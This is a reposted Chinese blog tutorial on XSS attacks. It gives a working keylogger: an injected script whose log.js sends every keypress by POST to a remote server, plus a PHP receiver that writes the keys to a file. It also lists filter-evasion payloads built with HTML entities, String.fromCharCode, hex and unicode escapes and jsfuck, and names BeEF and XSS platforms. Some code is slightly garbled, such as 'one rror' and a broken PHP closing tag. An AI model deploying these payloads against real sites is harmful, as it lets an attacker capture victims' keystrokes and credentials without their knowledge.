首页 > 其他分享 >xss攻击

xss攻击

时间:2022-10-24 17:11:22浏览次数:73  
标签:xss http 攻击 html &# key evt

xss键盘记录

xss插入代码

<script type="text/javascript" src="./log.js"></script>

log.js

document.onkeypress=function(evt){
evt=evt ? evt : window.event;
key=String.fromCharCode(evt.keyCode ? evt.keyCode : evt.charCode);
if(key){
var http=new XMLHttpRequest();
var param=encodeURI(key);
http.open("POST","http://本地服务器IP/keylog/log.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}

log.php

<?php
$key=$_POST['key'];
$logfile='key.txt';
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
>

xss编码方式

html实体编码

HTML解析器能识别在文本里和参数或属性值里的实体编码

html属性
html事件

无法写进<script>标签内容,只能配合事件触发
<img src=x one rror=alert(1)>
十进制:&#97;&#108;&#101;
十六进制:&#x28;&#x29;

进制编码

<script>eval(String.fromCharCode())</script>
<img src=x one rror=eval(String.fromCharCode())>
十进制:97,108,22
十六进制:\x61\x6c\x65
unicode:\u0061\u006c\u0065

url编码

<?php $xss=$_GET['xss'];echo $xss;?>

jsfuck

<img src=x one rror=js编码>
<script>js编码</script>
<script>function("alert(1)")()</script>

xss平台搭建

https://woj.app/1439.html

beEF工具

标签:xss,http,攻击,html,&#,key,evt
From: https://www.cnblogs.com/UshiromiyaBattler/p/16822099.html

相关文章

  • Vulnhub Hacksudo靶机超级详细攻击过程
    Hacksudo靶机信息(TargetInformation)目标主机信息:名称:Hacksudo环境Setup:将目标主机的网络模式修改为Host-only,而攻击机KaliLinux的其中一块网卡也设置为host-onl......
  • 基于AD Event日志识别域用户密码攻击
    01、简介针对域用户密码攻击,攻击者通常都会使用两种攻击方式进行测试,即:暴力破解(BruteForce)和密码喷洒(PasswordSpraying)。暴力破解(BruteForce)攻击,攻击者通过利用大量......
  • 基于AD Event日志识别DCSync攻击
     01、简介DCSync攻击是一种常见的域控攻击方法,利用DCSync导出域内用户的哈希值,本质上就是利用DRS(DirectoryReplicationService)协议通过IDL_DRSGetNCChanges从域控......
  • 基于AD Event日志识别DCShadow攻击
    01、简介DCShadow攻击,是攻击者在获取到域管理员权限后,通过将沦陷的主机伪造成域控,将预先设定的对象或对象属性复制到正在运行的域控服务器中。DCSync&DCShadow区别在于,DC......
  • CSRF 攻击
       csrf攻击的预防:1.敏感操作api尽量不使用get请求,原因:容易伪造2.验证码二次验证,用户发送请求时,要求短信验证码验证,确保是人为操作3.检查refer,浏览器发送请求到......
  • RIP路由欺骗攻击与防御策略
    一.工作目的掌握基于RIP路由欺骗攻击过程和RIP源端鉴别配置方法二.实验环境Vm1:win7客户机vm2:win2008web服务器三.实验拓扑              ......
  • JAVA代码审计之xss
    java_sec_codexss补充和回忆一下一些开发基础@RestController@RequestMapping(value="/xss")publicclassXsstest{@ResponseBody@GetMapping("/test")......
  • 维纳攻击 wiener attack
    维纳攻击wienerattack目录维纳攻击wienerattack攻击条件使用原理十三届全国大学生网络安全竞赛bd分析解答[羊城杯2020]rrrrrsa(wienerattack)分析解答攻击条件e过......
  • 共模攻击
    [NPUCTF2020]共模攻击上次做到了共模攻击的题,刚好来看看。共模攻击条件:当两个用户使用相同的模数N、不同的私钥,且加密同一明文消息时即存在共模攻击。原理:设两个......
  • 自动屏蔽DOS攻击shell脚本
    Dos攻击防范(自动屏蔽攻击IP)#!/bin/bashDATE=$(date +%d/%b/%Y:%H:%M)LOG_FILE=/usr/local/nginx/logs/demo2.access.logABNORMAL_IP=$(tail -n5000 $LOG_FILE |gr......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99